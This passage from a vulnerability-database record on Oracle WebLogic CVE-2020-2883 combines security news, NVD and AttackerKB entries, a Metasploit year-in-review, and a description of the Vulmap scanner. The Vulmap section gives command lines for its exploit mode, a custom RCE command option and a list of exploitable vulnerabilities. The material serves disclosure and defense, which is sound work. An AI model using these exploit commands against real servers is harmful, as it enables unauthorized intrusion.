exploit works by making an RPC call to \u201cSchRpcRegisterTask,\u201d which is exposed by the Task Scheduler service. However, in tweaking this function to thwart the exploit, 0patch discovered that a call is made to the also-exposed \u201cSchRpcSetSecurity\u201d if the original call to \u201cSchRpcRegisterTask\u201d fails \u2013 which SandboxEscaper uses as a kind of back-up mechanism to ensure successful exploitation.\n\n\u201cIt looked like some monitoring thread was used for getting the job done when the original call failed, but this thread was not called via RPC, and client impersonation could not be used there,\u201d explained Kolsek, in [a posting](<https://blog.0patch.com/2019/06/another-task-scheduler-0day-another.html>) on Tuesday. \u201cWe therefore decided on a more drastic approach and simply amputated the call to SetSecurity\u2026after that, we got the desired behavior.\u201d He added, \u201cSince we didn\u2019t even touch schedsvc.dll, the new (non-legacy) Task Scheduler functionality was not affected at all.\u201d\n\nThe micropatch is available for Windows 10 machines only \u2013 but there\u2019s a reason for that.\n\n\u201cWhile Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,\u201d Kolsek said. \u201cAs such, the impact on Windows 8 systems using the technique used by the public exploit appears to be negligible. We have not been able to demonstrate the vulnerability on Windows 7 systems.\u201d\n\nThe exploit for the flaw was the first in a string of recent exploits from SandboxEscaper, who said that she\u2019d like to sell these kinds of weapon for $60,000 to non-Western buyers (as of this writing, the exploit code has been removed from Github). Shortly after making the BearLPE exploit public, she [released three more plus an exploit for a Windows Internet Explorer bug](<https://threatpost.com/sandboxescaper-more-exploits-ie-zero-day/145010/>). Of these, 0patch is only working on one fix.\n\n\u201c\u2018[angrypolarbearbug2](<https://portal.msrc.microsoft.com/en-us/security-guidance/en-us/security-guidance/advisory/CVE-2019-0863>)\u2018 is not a 0day, as it was fixed by May 2019 Windows Updates,\u201d a spokesperson said via email. \u201cInstallerBypass \u2013 we were unable to reproduce it and know of no one being successful at that (it could be just really difficult to reproduce, or depending on some external factors that were not present in our testing environment); and \u2018sandboxescape\u2019 we were able to reproduce but don\u2019t consider it a critical enough bug for micropatching.\u201d\n\nThe fourth is a bypass bug that 0patch was able to verify and is analyzing for micropatching. It\u2019s a bypass for a previously released patch addressing a Windows permissions-overwrite, privilege-escalation flaw ([CVE-2019-0841](<https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/>)). The bug exists because Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\nSandboxEscaper has a history of releasing fully functional Windows zero-days. Last August, she [debuted another Task Scheduler flaw](<https://threatpost.com/microsoft-windows-zero-day-found-in-task-scheduler/136977/>) on Twitter, which was quickly [exploited in the wild](<https://threatpost.com/active-spy-campaign-exploits-unpatched-windows-zero-day/137237/>) in a spy campaign just two days after disclosure.\n\nIn October, SandboxEscaper [released an exploit](<https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/>) for what was dubbed the \u201cDeletebug\u201d flaw, found in Microsoft\u2019s Data Sharing Service (dssvc.dll). And towards the end of 2018 she [offered up two more](<https://threatpost.com/microsoft-windows-rce-flaw-gets-temporary-micropatch/141067/>): The \u201cangrypolarberbug,\u201d which allows a local unprivileged process to overwrite any chosen file on the system; and a vulnerability allows an unprivileged process running on a Windows computer to obtain the content of arbitrary file \u2013 even if permissions on such file don\u2019t allow it read access.\n", "cvss3": {}, "published": "2019-06-04T20:19:06", "type": "threatpost", "title": "Zero-Day No More: Windows Bug Gets a Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0841", "CVE-2019-0863", "CVE-2020-2883"], "modified": "2019-06-04T20:19:06", "id": "THREATPOST:63A1257305C8D791D6442D45DCD7142B", "href": "https://threatpost.com/zero-day-sandboxescaper-windows-fix/145337/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nShortly before Oracle\u2019s warning of the active exploits, proof of concept exploit code [was also published](<https://github.com/hktalent/CVE_2020_2546>) by a researcher (under the alias \u201chktalent\u201d) on GitHub for the flaw last week.\n\nAccording to Trend Micro\u2019s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic servers and other types of Java programs. According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data \u2013 allowing an attacker to execute code in the context of the current process.\n\nThe second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle\u2019s in-memory data grid and distributed caching solution.\n\n\u201cThe issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,\u201d according to ZDI. \u201cAn attacker can leverage this vulnerability to execute code in the context of the service account.\u201d\n\nAffected versions of WebLogic Server include versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n\nOracle did not disclose further details about how many were targeted or the attackers behind the hacks.\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T14:57:51", "type": "threatpost", "title": "Oracle: Unpatched Versions of WebLogic App Server Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2883"], "modified": "2020-05-04T14:57:51", "id": "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "href": "https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T15:18:49", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T14:15:00", "type": "cve", "title": "CVE-2020-2883", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-10-14T18:23:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0"], "id": "CVE-2020-2883", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:15:46", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 02, 2020 12:18am UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\n**space-r7** at May 15, 2020 7:15pm UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-2883"], "modified": "2020-07-30T00:00:00", "id": "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "href": "https://attackerkb.com/topics/Y21wr47Bk3/cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:30", "description": "An insecure deserialization vulnerability exists in the Oracle WebLogic Server. The vulnerability is due to the lack of input validation by the servlet. A successful attack could result in the execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Fusion Middleware WebLogic Server Insecure Deserialization (CVE-2020-2883; CVE-2020-2546; CVE-2020-2798; CVE-2020-2801; CVE-2020-2884)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2546", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2883", "CVE-2020-2884"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2020-0332", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-01-04T16:47:13", "description": "\n\n2020 was certainly an interesting year. There were quite a few newsworthy events and some fantastic exploit content released. Let\u2019s take a look at what 2020 meant for [Metasploit](<https://www.metasploit.com/>).\n\n## Quick stats\n\nSome quick statistics for Metasploit\u2019s year.\n\n * 737 pull requests merged (and counting)\n * A net gain of +179 non-payload modules\n * 50 new Auxiliary modules\n * 134 new Exploit modules\n * 23 new Post modules\n * 2 CTFs hosted\n * 1 new version\n\n## Metasploit 6\n\nThe Metasploit team [released version 6.0](<https://blog.rapid7.com/2020/08/06/metasploit-6-now-under-active-development/>) of the framework over the summer. This major change brought quite a few improvements on two fronts: the Meterpreter transport protocol and SMBv3 support for client connections. Both of these offered transport encryption for common operations performed by Metasploit, providing better security for the users. Additionally, to showcase the SMBv3 support, Metasploit added a [new module](<https://github.com/rapid7/metasploit-framework/pull/13995>) to perform agentless dumping of SAM hashes and LSA secrets (including cached creds) from remote Windows targets. The technique employed by this module has become very popular due to its reliability, and the native integration into the Metasploit Framework makes it easily accessible for users with all the related benefits like database and pivoting support.\n\n## CTFs\n\nThere were not one but two open CTFs hosted by the Metasploit team in 2020. These events invited the community to solve challenges in a fun and competitive environment. The [most recent event](<https://blog.rapid7.com/2020/12/07/congrats-to-the-winners-of-the-2020-december-metasploit-community-ctf/>) included 1,903 users registered across 874 teams.\n\n## New module highlights\n\n * **exploit/windows/local/anyconnect_lpe (CVE-2020-3153 & CVE-2020-3433)** \\- This exploit module was an excellent example of a trend of patch bypasses this year. The module is capable of leveraging both the original vulnerability along with the bypass for maximum coverage.\n * **exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move (CVE-2020-0787)** \\- This exploit targeted Windows BITS to overwrite a DLL. Exploiting native services included on Windows is always useful, and the technique leveraged here to use the file system operation to obtain code execution was an interesting case.\n * **post/multi/gather/enum_software_versions **\\- It\u2019s often important for users to know what is on a system they have compromised. This new module helps make that process simple by enumerating the installed software and their versions, allowing the user to identify interesting entries for exploitation or living-off-the-land techniques.\n * **exploit/multi/misc/weblogic_deserialize_badattrval (CVE-2020-2555) **\\- WebLogic is always a valuable target and deserialization vulnerabilities are quite reliable by nature. That combination makes this module particularly useful.\n * **exploit/multi/misc/weblogic_deserialize_badattr_extcomp (CVE-2020-2883)** \\- Another more recent WebLogic RCE that makes use of deserialization. Similar to CVE-2020-2555, this module is equally useful.\n * **exploit/windows/local/cve_2020_0668_service_tracing (CVE-2020-0668) **\\- Users can never have enough Windows LPE exploits, and this module offered another reliable vector. This module uses a simple DLL-based technique to obtain code execution from a file system operation.\n\n## SharePoint\n\nMetasploit added its first exploits for the popular SharePoint platform since 2010. Four exploit modules were added, three leverage XML injection flaws while the fourth targets a server side include. These exploits leverage .NET deserialization to execute operating system commands, avoiding any kind of memory corruption and making exploitation relatively reliable. The .NET deserialization gadgets leveraged by these modules were also new in 2020. This functionality came in the form of a [new library](<https://github.com/rapid7/metasploit-framework/wiki/.NET-Deserialization>) that even includes a command line tool for generating gadget chains for researchers.\n\n## Interesting trends\n\nOver the course of the year, there were some interesting patterns that were observable. In general, there seemed to have been an increase in vulnerabilities that were disclosed and related to an insufficient remediation for a previous vulnerability. These so-called patch bypasses seem to be indicative of the increasing complexity of vulnerabilities and their respective solutions. Additionally, there were multiple exploits added to Metasploit that leveraged vulnerable file system operations to obtain code execution on Windows. These LPEs used a combination of techniques that are becoming increasingly common including op-locks and junctions. Metasploit is working on better support for these primitives to facilitate exploitation of vulnerabilities that use them.\n\nWith all that the project accomplished in 2020, the team looks forward to what 2021 will hold. New features are [being discussed](<https://github.com/rapid7/metasploit-framework/discussions>), and as always, the module pipeline continues to flow. Our sincere gratitude goes to all the members of the community that contributed to the project this year.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n### More HaXmas blogs\n\n * [Help Others Be \"Cyber Aware\" This Festive Season\u2014And All Year Round!](<https://blog.rapid7.com/2020/12/17/help-others-be-cyber-aware-this-festive-season-and-all-year-round/>)\n * [UPnP With a Holiday Cheer](<https://blog.rapid7.com/2020/12/22/upnp-with-a-holiday-cheer/>)\n * [Metasploit Tips and Tricks for HaXmas 2020](<https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/>)\n * [Top Security Recommendations for 2021](<https://blog.rapid7.com/2020/12/24/top-security-recommendations-for-2021/>)\n * [Rapid7 Labs\u2019 2020 Naughty List Summary Report to Santa](<https://blog.rapid7.com/2020/12/25/rapid7-labs-2020-naughty-list-summary-report-to-santa/>)\n * [Taking Inspiration from Our Security Nation in an Otherwise Uninspiring Year](<https://blog.rapid7.com/2020/12/28/taking-inspiration-from-our-security-nation-in-an-otherwise-uninspiring-year/>)\n * [Predicting the Unpredictable: What Will the Cybersecurity Space Look Like in 2021?](<https://blog.rapid7.com/2021/01/02/predicting-the-unpredictable-what-will-the-cybersecurity-space-look-like-in-2021/>)\n * [HaXmas Hardware Hacking](<https://blog.rapid7.com/2021/01/02/haxmas-hardware-hacking/>)", "cvss3": {}, "published": "2020-12-30T15:38:00", "type": "rapid7blog", "title": "Metasploit 2020 Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0668", "CVE-2020-0787", "CVE-2020-2555", "CVE-2020-2883", "CVE-2020-3153", "CVE-2020-3433"], "modified": "2020-12-30T15:38:00", "id": "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "href": "https://blog.rapid7.com/2020/12/30/metasploit-2020-wrap-up/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:21", "description": "[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files 